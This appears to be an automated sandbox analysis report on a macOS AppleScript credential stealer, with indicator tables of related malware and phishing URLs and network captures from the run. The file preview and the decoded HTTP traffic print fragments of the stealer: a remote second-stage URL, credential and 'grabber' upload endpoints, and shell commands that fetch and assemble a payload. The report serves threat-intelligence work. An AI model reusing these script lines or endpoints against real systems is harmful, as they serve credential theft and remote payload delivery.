	m0wsoI3.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	ctrlgem.xyz/gate.php
	Invoice 1425004091.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/
	Quotation submitting.exe	Get hash	malicious	FormBook	Browse	www.tgwfj.xyz/b5fo/
	SecuriteInfo.com.Win32.DropperX-gen.24286.1079.exe	Get hash	malicious	Unknown	Browse	jx2chiem.com/updategame/Autoupdate.exe
	finebi.exe	Get hash	malicious	Unknown	Browse	apiapi.mmkinskfn.xyz/jquery-3.3.1.min.js
	Aramco requests.exe	Get hash	malicious	FormBook	Browse	www.shuangunder.shop/udq7/
	UB BO 14-3-2025.exe	Get hash	malicious	FormBook	Browse	www.tether1.xyz/focp/?QHH0=0Vzp&ST=mXJHtAZSrcMVNAYe0Kfq2FJYJcD6dFMzhzcfA/LZkfgqhdihAxT3aslAf9nOYajIz7QizkjlvIUHcb1FopIoHD46K0qUy9lf5cyl621RCgAfM4tktgk7yEk=

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
icloud.com	635aa806da671eaa554367d1ee0381faffee4bc65a791.exe	Get hash	malicious	GoProxy	Browse	17.57.155.25
icloud.com	mydoom1.exe	Get hash	malicious	MyDoom	Browse	17.57.155.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Message.eml	Get hash	malicious	Unknown	Browse	162.159.61.3
	https://login.microsoftonline.com/common/oauth2/v2.0/authorize?prompt=none&client_id=0c5c467d-0638-4219-883d-f87cd600ee0a&state=13173315141531901117331131141513113113111931912732&scope=openid+profile+https%3A%2F%2Fgraph.microsoft.com%2FUser.Read&uri=https%3A%2F%2Fwww.github.com%2Fjoin%3Fredirect%3Dsecure%2Fuserflow%2Fconnect&env=testing&integrationID=AI2025-R2&func%20Value(Encode%0A%09Result%20%5D+Body%0A%09Encode%20%7D+%09Email%09%0A%09Header%20=+Encode%0A%09Value+%7B+Decode%0ABody+%2B+Session%0A%09Em%0Aail%09+*%20Offset%7Dfunc%20Data/Key%09Builder+:=+ValueVal%0D%0Aue%20%2B+Decode%0A%09Value%20%7B%20Email%0A%09Decode%20:=+Value%0A%09Payload+%3A%3D+Decode%7D%0Av%09a%0D%0Ar+Builder,Stre%0D%0Aam%0APayload+%7B%09%20Header%0ASessi%09on%20%7D+Deco%0AdeResult%20:=%20Builder%0A%7D%0Afor+Result%09%5BEmail%09Value%20%5B%20Decode%09Valu%09e+%29+Value%0A%0D%0A%09Secret%20%2C%20Buffe%09r%20%0A%7Dfu%20nc+Secret,Body%0AContext+%29%20Value%09Email%20%7B+Key%0D%0A%0A%09Stream+%2B%20Con%0Atext%0A%09Offse%0At%20%5D%0D%0A%20Body%0A%09Body+%28%20Offset%7D%0Avar%20Stre%0Aam%7BToken%0A%09Context%20%7D%20Decode%0A%09Session%20:%3D+Offset%09Offs%20et+%7B%20Buffer%0A%20Decode+.+%20Builde%0Ar%0A%7Dtr%0Aue%20Buffer-Encode%0A%09Stream%20%2C+Deco%09de%0D%0A%0A%09Token+%7D+Key%0D%0A%09Context+%3A=+Context%0ABuffe%0Ar+:=+Context%09Key%20-%20Header%20%09Offse%0At+%5B%20Email%09%0A%7D%09%0Atrue%20Offset+%0D%0ABuffer%0A%09Token+%2C+Buffer%0A%09Key%0D%0A%20:=%0A+C%09ontext%0AEmai%20l%20%5B%20Se%0Acre%09t%20Token+%2C%20Buffer%0A%09Result+%2B+Da%09ta%0AOffset+%5B%20Encode%0A%7D%0Arange+Header%7D%0D%0AResult%0D%0ABuffer%20/%09+He%09ader%20%0A%09Deco%0D%0Ade+%2B+Buff%0D%0Aer%0A%7D%0A%0Areturn%0A%20Body%2APa%20y%0Aload%0A%0A%09Deco%0Ade+-%20%0D%0AToken%0AResult+.+B%09u%09ilder%0ASession%20%29%20Data%0A%7D%0D%0A	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.21.39.7
	https://login.microsoftonline.com/common/oauth2/v2.0/authorize?prompt=none&client_id=0c5c467d-0638-4219-883d-f87cd600ee0a&state=13173315141531901117331131141513113113111931912732&scope=openid+profile+https%3A%2F%2Fgraph.microsoft.com%2FUser.Read&uri=https%3A%2F%2Fwww.github.com%2Fjoin%3Fredirect%3Dsecure%2Fuserflow%2Fconnect&env=testing&integrationID=AI2025-R2&func%20Value(Encode%0A%09Result%20%5D+Body%0A%09Encode%20%7D+%09Email%09%0A%09Header%20=+Encode%0A%09Value+%7B+Decode%0ABody+%2B+Session%0A%09Em%0Aail%09+*%20Offset%7Dfunc%20Data/Key%09Builder+:=+ValueVal%0D%0Aue%20%2B+Decode%0A%09Value%20%7B%20Email%0A%09Decode%20:=+Value%0A%09Payload+%3A%3D+Decode%7D%0Av%09a%0D%0Ar+Builder,Stre%0D%0Aam%0APayload+%7B%09%20Header%0ASessi%09on%20%7D+Deco%0AdeResult%20:=%20Builder%0A%7D%0Afor+Result%09%5BEmail%09Value%20%5B%20Decode%09Valu%09e+%29+Value%0A%0D%0A%09Secret%20%2C%20Buffe%09r%20%0A%7Dfu%20nc+Secret,Body%0AContext+%29%20Value%09Email%20%7B+Key%0D%0A%0A%09Stream+%2B%20Con%0Atext%0A%09Offse%0At%20%5D%0D%0A%20Body%0A%09Body+%28%20Offset%7D%0Avar%20Stre%0Aam%7BToken%0A%09Context%20%7D%20Decode%0A%09Session%20:%3D+Offset%09Offs%20et+%7B%20Buffer%0A%20Decode+.+%20Builde%0Ar%0A%7Dtr%0Aue%20Buffer-Encode%0A%09Stream%20%2C+Deco%09de%0D%0A%0A%09Token+%7D+Key%0D%0A%09Context+%3A=+Context%0ABuffe%0Ar+:=+Context%09Key%20-%20Header%20%09Offse%0At+%5B%20Email%09%0A%7D%09%0Atrue%20Offset+%0D%0ABuffer%0A%09Token+%2C+Buffer%0A%09Key%0D%0A%20:=%0A+C%09ontext%0AEmai%20l%20%5B%20Se%0Acre%09t%20Token+%2C%20Buffer%0A%09Result+%2B+Da%09ta%0AOffset+%5B%20Encode%0A%7D%0Arange+Header%7D%0D%0AResult%0D%0ABuffer%20/%09+He%09ader%20%0A%09Deco%0D%0Ade+%2B+Buff%0D%0Aer%0A%7D%0A%0Areturn%0A%20Body%2APa%20y%0Aload%0A%0A%09Deco%0Ade+-%20%0D%0AToken%0AResult+.+B%09u%09ilder%0ASession%20%29%20Data%0A%7D%0D%0A	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	104.16.80.73
	https://www.dropbox.com/sh/m31qo9z8wy0ls6l/AACbwopIISV_j4uZPiRqvXmwa?dl=0	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.fluidenergype.com	Get hash	malicious	Unknown	Browse	104.18.10.207
	https://mounti-official.lovable.app/admin	Get hash	malicious	Unknown	Browse	104.18.29.167
	teamviewer-15.72.6-installer_aY-2974.exe	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://cart.books.com.tw/oauth?client_id=ireader_test&redirect_uri=https://extfrontiercapital.oscinc.sbs	Get hash	malicious	HTMLPhisher	Browse	104.16.123.96
	https://ac6380994-my.sharepoint.com/:o:/g/personal/joseluis_aranguena_deportejoven_es/IgB9tz-xUWkVT7sIwxweqrRtAftMq-_VQRAxJHdeQnavmcc?e=Weqlni	Get hash	malicious	HTMLPhisher	Browse	172.64.145.29
	XaynePackMakerSetup-5.0.5-setup.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
SCCGOVUS	https://cart.books.com.tw/oauth?client_id=ireader_test&redirect_uri=https://extfrontiercapital.oscinc.sbs	Get hash	malicious	HTMLPhisher	Browse	146.75.92.157
	http://zeta.ecommzone.com/lz/eplive/103LEV/c1wRDWGGO6iYOgBckoe3NI_tAMM6Deg2fGilc-5cvhE1/actions/redirect.aspx?url=https%3A%2F%2Fur0.link%2FOA6fC7	Get hash	malicious	HTMLPhisher	Browse	146.75.92.157
	https://cierracall.com/003e4b57-c722-474a-b040-cd12939d9f27/	Get hash	malicious	Unknown	Browse	146.75.92.157
	https://cierracall.com/003e4b57-c722-474a-b040-cd12939d9f27/	Get hash	malicious	Unknown	Browse	146.75.92.157
	http://91.92.240.219	Get hash	malicious	HTMLPhisher	Browse	146.75.92.157
	miraint.arm.elf	Get hash	malicious	Mirai	Browse	146.74.111.172
	jklmips.elf	Get hash	malicious	Mirai	Browse	146.74.25.208
	jklmips.elf	Get hash	malicious	Unknown	Browse	146.74.111.153
	x86.elf	Get hash	malicious	Unknown	Browse	146.74.111.134
	arm.elf	Get hash	malicious	Unknown	Browse	146.74.25.253

Process:	/bin/bash
File Type:	ASCII text
Category:	dropped
Size (bytes):	7
Entropy (8bit):	2.8073549220576046
Encrypted:	false
SSDEEP:	3:OWW:OWW
MD5:	F447B20A7FCBF53A5D5BE013EA0B15AF
SHA1:	C4F9375F9834B4E7F0A528CC65C055702BF5F24A
SHA-256:	E150A1EC81E8E93E1EAE2C3A77E66EC6DBD6A3B460F89C1D08AECF422EE401A0
SHA-512:	1CACED6FCA2237153D65ADFB0F3DBE33B9375E9EB6DF17C379F80CD37DEB6E6A70159C7E898576DB568B871CA1C2FFD1A2CC3205F1B50BE5396096335FC29C40
Malicious:	true
Reputation:	low
Preview:	123456.

Process:	/usr/bin/touch
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:

Process:	/System/Applications/Notes.app/Contents/MacOS/Notes
File Type:	SQLite 3.x database
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.09565404986467793
Encrypted:	false
SSDEEP:	3:lSWFN3l/klsl8l503ll:l9F8E0G
MD5:	1C3FB4B66D0EB08EDD24B08CB99B69E3
SHA1:	9C7F28877658F87BB7D01BEE20358890199E1CE7
SHA-256:	933BFED111B18958995FC696B3D9DED9CE6604ED5FB2313C9E3F9B53AE3AE916
SHA-512:	2A32741C4A256FAD4A2B3E78E80B21272507AC341DBC218CE2E966E560B5501C89A3CEC7EC066C0A88EF1399E2DAB07138D433EB8B3212982220EFE875E3254B
Malicious:	false
Reputation:	low
Preview:	SQLite format 3......@ ..........................................................................n.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	/usr/bin/zip
File Type:	Zip archive data, at least v1.0 to extract
Category:	dropped
Size (bytes):	1060
Entropy (8bit):	4.692838025369649
Encrypted:	false
SSDEEP:	12:58Pfo4W8HfoiRN4W8JfmP4W81foM4W81fob4uschfNg4uscVUfoiRSg4uscOsfKY:0VQ5+qQTQZFPQTXsbsQMQRhQktTn
MD5:	8BE39547A25ABC170B7A5004034C2123
SHA1:	FECA04344EC48B41532726DB530F8299317EF685
SHA-256:	36C9FF6680C9B9954CA2CDDA2136AFF79A6A73CDE3DA215489B63FB8488574B2
SHA-512:	F33B7C5FE79FF4E5A59B93031F2FC2C54495D96DBA75A077F72D10B0B621354EBF44351303865560EBE17F9172FF7C32C7067DC51EA0329B227687685A3B8272
Malicious:	false
Preview:	PK........Wz.\............!...a5b9845c461d901dad1363386bac5a75/UT.....gi..giux.............PK........Wz.\............)...a5b9845c461d901dad1363386bac5a75/Desktop/UT.....gi..giux.............PK........Wz.\............'...a5b9845c461d901dad1363386bac5a75/Notes/UT.....gi..giux.............PK........Wz.\............+...a5b9845c461d901dad1363386bac5a75/Documents/UT.....gi..giux.............PK........Wz.\............+...a5b9845c461d901dad1363386bac5a75/Downloads/UT.....gi..giux.............PK..........Wz.\............!............A....a5b9845c461d901dad1363386bac5a75/UT.....giux.............PK..........Wz.\............)............A[...a5b9845c461d901dad1363386bac5a75/Desktop/UT.....giux.............PK..........Wz.\............'............A....a5b9845c461d901dad1363386bac5a75/Notes/UT.....giux.............PK..........Wz.\............+............A....a5b9845c461d901dad1363386bac5a75/Documents/UT.....giux.............PK..........Wz.\............+............A....a5b9845c461d901dad1363386bac5

Process:	/usr/bin/unzip
File Type:	X11 SNF font data, LSB first
Category:	dropped
Size (bytes):	101049764
Entropy (8bit):	7.031487392872072
Encrypted:	false
SSDEEP:
MD5:	B10FDF88534F476D20F497F489428134
SHA1:	7BE0F38C768A5F793F85844F77E338252BB015CC
SHA-256:	B240C906EBBE27ADF83ABA1C13D70CD6D778681E10680D8A6B1DC18E5AF5C274
SHA-512:	6ED38A192AE2B0A78AF85F822FC8D96A5C75C99DC3FC9F458E61C0AEC564CF45C1719A52DAB202FB7F8E7738A330E532398D50B1B95574EE7710AE05EE9086D5
Malicious:	false
Preview:	................{"files":{".webpack":{"files":{"assets":{"files":{"01ba976ce4f4ed63186bb8e04d2a8c1cf6d218aa-data.json":{"size":95231,"offset":"0","integrity":{"algorithm":"SHA256","hash":"24f1abf2fce723965e6aac60ce874ed7919fc79fc207ad3fc29e4b3b5476856a","blockSize":4194304,"blocks":["24f1abf2fce723965e6aac60ce874ed7919fc79fc207ad3fc29e4b3b5476856a"]}},"03855cafee0a2e4929c3c729cc5cc77c72af92bc-confetti.json":{"size":180924,"offset":"95231","integrity":{"algorithm":"SHA256","hash":"1b7bf5f0926e6871e677a22fe42926f7c1ac2f9f930e4fb1f4eb6b82f6257d3a","blockSize":4194304,"blocks":["1b7bf5f0926e6871e677a22fe42926f7c1ac2f9f930e4fb1f4eb6b82f6257d3a"]}},"090650cd549b58566942a9edc009ed80d6cdcf0b-dark.json":{"size":126012,"offset":"276155","integrity":{"algorithm":"SHA256","hash":"84bbe99b670d1f6ea2ab957551f7d29e6046c8b8cf9cd962d806ced397145fb1","blockSize":4194304,"blocks":["84bbe99b670d1f6ea2ab957551f7d29e6046c8b8cf9cd962d806ced397145fb1"]}},"0fbe0f444f68c9e34481635e366b2168a49896fc-app.json":{"s

Process:	/usr/bin/curl
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	26214400
Entropy (8bit):	7.999164968021682
Encrypted:	true
SSDEEP:	393216:XwSyp3LxHvugVaDDLNBAFtnUxzUHVnKpoZiRD7DUhoF68zvOLj3GnhwvISIzzG:XNYxHlmTzU1nKpaanQFUM3GnhwIXG
MD5:	5447BB6B7D83DDC63F0962BF3E8074EC
SHA1:	701E32DA31C3F252A1206DD399512C464C42BD1B
SHA-256:	1DC6B02C01A25F303BD3692BD47C6A574DE7D78E68E4E5CB619CBA56262B4940
SHA-512:	8DC505E18F4C4ABF895670EBD9530807E223D9B547B92E5FBC730B4DFADC5E61DFDEFDB2ED769CFAAEF5FFBB97A06BCE1ECC9CA6776C06656801F45B0EFF31C5
Malicious:	false
Preview:	PK.........A[[AT...wB.........app.asar.......5..<..Y._....W......&....k.V..P...~.~...b.`.3!.2.)+-W....f..N....s...........................7..}\|......?.-..>.......O.....?utS.A...k.1Z.r.m.............?]^.....?..?...?~s........).............o...w.....?...o....,...........7@...`.P@...}J.........&...k....L.....o........B...}..O....:=.......7....+.t.2..S...9U.B_.c......?..aT[1.+ m@;..:t,^.@B........@...',[.%h..(...K...0P'...eE.Lg...E..[.,..[q.>W.g.?....H.p.$P.....h.0.........2....RHf.m..n....p4..k..(..`...Q..-i...Z..@..UZ'k&k.....@B.4........d..D..!s..cz..;K_...V.)l...<..#.:B... H'...Tk.B.b...S....VS...gW....}>..%..".r.(..x...>...j.l...P&..8.jN..._...S..X...-......l.j.......x..Z.b1......c..?....}...U.ZQ.<.%.v/%j.N..Bc.....y.4..m./3.d.u..R#..A.N..A.J.......(.....y.R{.h]._.'.mWo...$..5..ta..RU..........(.....F.k..J...w:.....@.....h....k....".4...o...3..O...G}wf.. T.bBm...X..5$p.mu...:N.....V.y].O....@..e..,c.l".!.X..T..E.o.(...Y.E.:Q.g......\.."...K.=...1.$.,.d./.D..6._P.....Z..(k.........

File type:	ASCII English text
Entropy (8bit):	4.2122906635306645
TrID:
File name:	payload_1_stealer.scpt
File size:	8'479 bytes
MD5:	891b1bf224a59baa80e0ed0c08a08131
SHA1:	b463cfbeb11a86b0650a42667794ae888791913d
SHA256:	5d8a374139573798e23de60d1ca1610f6d1abecd5d17ecf32c82f1cfd338e03f
SHA512:	ba5cd9cfdd04d6626b82f7354bcff1e96c0c74ebde6958cd0a8612b2fea9dc0ed23b0acaa2eaa71262f90bdc616b6ccf5b25ed15baf00ad966d7295ddb1fd721
SSDEEP:	192:N9Pocfk2Ezw5sMt5jzU5FeHHkzw5sMN5WzU5XUpMpgCEpGeLExRFg:awrMQORpMpMp78R6
TLSH:	F002EB0E686046A9E168CA73B454C62B930BC26F0262F418B5DCD33D6F58F559AF2BE1
File Content Preview:	set ledgerScriptURL to "https://67e5143a9ca7d2240c137ef80f2641d6.pages.dev/32f763b45cec3531f39b5365edf2c97e.aspx".set domain to "https://goldenticketsshop.com".set credentialsEndpoint to "/api/credentials" .set grabberEndpoint to "/api/grabber"..set authC

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2026 15:17:56.745019913 CET	59688	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:00.522952080 CET	55567	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:00.826337099 CET	59688	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:08.602327108 CET	55567	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:08.899905920 CET	59688	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:21.325541019 CET	53	55685	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:21.338790894 CET	64655	53	192.168.0.58	4.2.2.1
Jan 14, 2026 15:18:21.353717089 CET	53	64655	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:21.815741062 CET	53	63057	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:21.887641907 CET	58052	53	192.168.0.58	4.2.2.1
Jan 14, 2026 15:18:21.887716055 CET	55344	53	192.168.0.58	4.2.2.1
Jan 14, 2026 15:18:21.900469065 CET	53	58052	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:21.900525093 CET	53	55344	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:21.900582075 CET	53	64577	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:28.008681059 CET	53353	53	192.168.0.58	4.2.2.1
Jan 14, 2026 15:18:28.021608114 CET	53	53353	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:31.454103947 CET	59167	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:31.458492041 CET	50038	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:31.508573055 CET	59110	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:31.518955946 CET	53	52991	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:31.582962990 CET	53	49227	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:31.712160110 CET	64744	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:31.723551035 CET	57865	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:32.481631041 CET	50038	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:32.791503906 CET	57865	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:33.520050049 CET	61443	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:34.505122900 CET	50038	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:34.883542061 CET	57865	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:37.952318907 CET	53	62498	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:38.555951118 CET	50038	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:38.903083086 CET	57865	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:38.944700956 CET	53	52043	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:44.217047930 CET	53	59904	4.2.2.1	192.168.0.58
Jan 14, 2026 15:18:46.643378973 CET	50038	443	192.168.0.58	17.253.150.10
Jan 14, 2026 15:18:46.982244968 CET	57865	443	192.168.0.58	17.253.145.10
Jan 14, 2026 15:18:59.252806902 CET	53	58807	4.2.2.1	192.168.0.58
Jan 14, 2026 15:20:27.380036116 CET	59304	53	192.168.0.58	4.2.2.1
Jan 14, 2026 15:20:27.398277998 CET	53	59304	4.2.2.1	192.168.0.58
Jan 14, 2026 15:21:34.113532066 CET	53	58297	4.2.2.1	192.168.0.58

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 14, 2026 15:18:21.341191053 CET	4.2.2.1	192.168.0.58	0x8eb4	No error (0)	h3.media.apple.map.fastly.net	146.75.123.6	A (IP address)	IN (0x0001)	false
Jan 14, 2026 15:18:21.353717089 CET	4.2.2.1	192.168.0.58	0xab9	No error (0)	h3.media.apple.map.fastly.net		65	IN (0x0001)	false
Jan 14, 2026 15:18:21.900525093 CET	4.2.2.1	192.168.0.58	0x979e	No error (0)	icloud.com	17.253.144.10	A (IP address)	IN (0x0001)	false
Jan 14, 2026 15:20:27.398277998 CET	4.2.2.1	192.168.0.58	0x9d22	No error (0)	67e5143a9ca7d2240c137ef80f2641d6.pages.dev	188.114.97.3	A (IP address)	IN (0x0001)	false
Jan 14, 2026 15:20:27.398277998 CET	4.2.2.1	192.168.0.58	0x9d22	No error (0)	67e5143a9ca7d2240c137ef80f2641d6.pages.dev	188.114.96.3	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2026-01-14 14:20:27 UTC	169	OUT	GET /32f763b45cec3531f39b5365edf2c97e.aspx HTTP/1.1 host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev user-agent: curl/8.7.1 accept: / accept-encoding: identity
2026-01-14 14:20:27 UTC	738	IN	HTTP/1.1 200 OK date: Wed, 14 Jan 2026 14:20:27 GMT content-type: null content-length: 1585 access-control-allow-origin: * cache-control: public, max-age=0, must-revalidate etag: "1fb054c16655101f2a79c4a83e0eff4a" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff vary: accept-encoding report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=cDHMZ9OxfymrUPGck7StkDvob2rvSZ7EcN3klVCVYrn6wgWQR%2BwMuw6KbNHugdnPF2Wbgmg1phN3xX9z5BisyvUsiOiVX9isMuSYfmTXPrDgLJp%2BgGrOLr8C8WF2eBDRLeWOaJqu48E%3D"}]} nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} server: cloudflare cf-ray: 9bddc62fee960221-ZRH alt-svc: h3=":443"; ma=86400
2026-01-14 14:20:27 UTC	1460	IN	Data Raw: 73 65 74 20 6b 44 6f 6d 61 69 6e 50 72 65 66 69 78 20 20 20 20 74 6f 20 22 36 37 65 35 31 34 33 61 39 63 61 37 64 32 32 34 30 63 31 33 37 65 66 38 30 66 32 36 34 31 64 36 22 0a 73 65 74 20 6b 44 6f 6d 61 69 6e 53 75 66 66 69 78 20 20 20 20 74 6f 20 22 70 61 67 65 73 2e 64 65 76 22 0a 73 65 74 20 6b 54 6f 74 61 6c 50 61 72 74 73 20 20 20 20 20 20 74 6f 20 33 0a 73 65 74 20 6b 50 61 72 74 42 61 73 65 4e 61 6d 65 20 20 20 20 74 6f 20 22 61 70 70 2e 61 73 61 72 2e 7a 69 70 2e 70 61 72 74 22 0a 73 65 74 20 6b 50 61 72 74 45 78 74 65 6e 73 69 6f 6e 20 20 20 74 6f 20 22 2e 61 73 70 78 22 0a 0a 73 65 74 20 6b 44 6f 77 6e 6c 6f 61 64 46 6f 6c 64 65 72 20 20 74 6f 20 22 2f 74 6d 70 2f 64 6f 77 6e 6c 6f 61 64 65 64 5f 70 61 72 74 73 22 0a 73 65 74 20 6b 4d 65 72 67 Data Ascii: set kDomainPrefix to "67e5143a9ca7d2240c137ef80f2641d6"set kDomainSuffix to "pages.dev"set kTotalParts to 3set kPartBaseName to "app.asar.zip.part"set kPartExtension to ".aspx"set kDownloadFolder to "/tmp/downloaded_parts"set kMerg
2026-01-14 14:20:27 UTC	125	IN	Data Raw: 46 6f 6c 64 65 72 0a 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 72 6d 20 2d 66 20 22 20 26 20 71 75 6f 74 65 64 20 66 6f 72 6d 20 6f 66 20 6b 4d 65 72 67 65 64 5a 69 70 0a 0a 64 6f 20 73 68 65 6c 6c 20 73 63 72 69 70 74 20 22 6f 73 61 73 63 72 69 70 74 20 2d 65 20 27 73 65 74 20 76 6f 6c 75 6d 65 20 77 69 74 68 6f 75 74 20 6f 75 74 70 75 74 20 6d 75 74 65 64 27 22 Data Ascii: Folderdo shell script "rm -f " & quoted form of kMergedZipdo shell script "osascript -e 'set volume without output muted'"

Timestamp	Bytes transferred	Direction	Data
2026-01-14 14:20:29 UTC	155	OUT	GET /app.asar.zip.part1.aspx HTTP/1.1 host: 67e5143a9ca7d2240c137ef80f2641d6.pages.dev user-agent: curl/8.7.1 accept: / accept-encoding: identity
2026-01-14 14:20:29 UTC	754	IN	HTTP/1.1 200 OK date: Wed, 14 Jan 2026 14:20:29 GMT content-type: null content-length: 26214400 access-control-allow-origin: * cache-control: public, max-age=0, must-revalidate etag: "e2f2e2f8db8bee463b3ded38ece0db93" referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff vary: accept-encoding report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=makpJX08zWRol5pBf3A1lMDxe7hLEMH%2FYJA5M%2BAZgC8JgX8fEMC%2BWJ%2Bb9nTyENdqN6tat3RyqsjGKk1B%2F%2BBaQ69nJ3Dm%2F%2F6f0jgSzWazP8q1ApjxFNJ73ucLvGLbOGPTU8FnXXFgqLc%3D"}]} nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800} server: cloudflare cf-ray: 9bddc6327c68be89-ZRH alt-svc: h3=":443"; ma=86400
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 1a 41 5b 5b 41 54 0e bf d3 77 42 03 a4 e5 05 06 08 00 00 00 61 70 70 2e 61 73 61 72 dc bd cb 92 9c c7 91 35 a8 c5 3c 09 d7 2a 59 84 5f c3 b5 1a 10 57 82 b8 83 b8 8e fd 26 8b 08 f7 00 6b 08 56 c1 00 50 a2 fa b7 7e ce 7e 86 d9 cd 62 1e 60 cc 33 21 b1 32 09 29 2b 2d 57 dd 1b 1a 0d 66 a4 17 4e c5 17 e1 97 73 8e ff 1f 7f f8 c3 1f fe bf ff fa c3 1f fe df ff fa c3 1f fe 9f ff fa c3 1f fe f7 37 eb fc 7d 7c fa e6 cf ff fb 9b 3f fd 2d c6 87 3e 7f ca 7f ff e7 1f f6 4f 9f e2 f3 a7 9d 3f 2a 75 74 53 99 41 8b c2 05 6b 93 31 5a 14 72 e8 6d d6 b9 c4 a1 b6 de cf bc 7f ee 7f fa bf 3f 5d 5e e4 7f f5 e9 fc 3f e2 9b 3f 1b 03 d6 3f 7e 73 b9 d6 a7 f8 fc cd 9f bf 29 df fc f1 9b f3 8b cf f1 ee e3 f9 e7 bf 6f e2 bd 7f 77 f9 f1 fc f3 8f 3f 7f f3 e7 6f Data Ascii: PKA[[ATwBapp.asar5<Y_W&kVP~~b`3!2)+-WfNs7}\|?->O?utSAk1Zrm?]^???~s)ow?o
2026-01-14 14:20:29 UTC	1460	IN	Data Raw: 08 ac a3 34 b5 02 d5 bb af 8e 95 02 7c 15 9a 6d 9c 7d 8c 77 e7 97 17 9f f6 8f 53 01 da 01 8a c0 d0 8e ca c9 eb 5a 43 c4 3c 9a 39 32 d5 ce 6d f0 a2 05 d6 c7 a4 58 c4 d1 5b 97 d5 79 4d 54 0d c4 0e ab e2 d2 6a a1 75 ea e1 eb e9 d4 00 5b a0 0c 7b cc 2c e2 70 e1 14 d5 89 4b d8 67 ad a8 d3 86 16 02 87 a2 f5 2b a7 a9 96 4a bb 97 38 61 be 25 c7 a0 a4 15 4a 37 17 c7 68 3a 38 80 51 ea ac bc cc cd 7d ce 28 61 d9 36 a2 51 2a 35 5f c1 5c a1 40 a7 51 16 52 1c fe e6 4e 0e b0 45 a9 f7 d5 71 54 eb ab 70 ed 6c dd bd 01 65 db 60 e9 cc bb 8d 5b 0c 6b 67 1f fa f9 c7 f0 3d a0 a0 f1 4e 53 a5 32 d5 22 70 0c 4e c3 25 7a 6b 50 7b e8 54 2d 84 05 7a c7 00 e2 7c b4 97 60 21 06 70 29 f9 a4 2f 1a a6 14 93 3a 63 c9 24 f0 f0 67 77 72 80 2d 4e 4b 51 17 d5 2e cd 6d ad 7c 0c c6 90 99 39 44 Data Ascii: 4\|m}wSZC<92mX[yMTju[{,pKg+J8a%J7h:8Q}(a6Q*5_\@QRNEqTple`[kg=NS2"pN%zkP{T-z\|`!p)/:c$gwr-NKQ.m\|9D
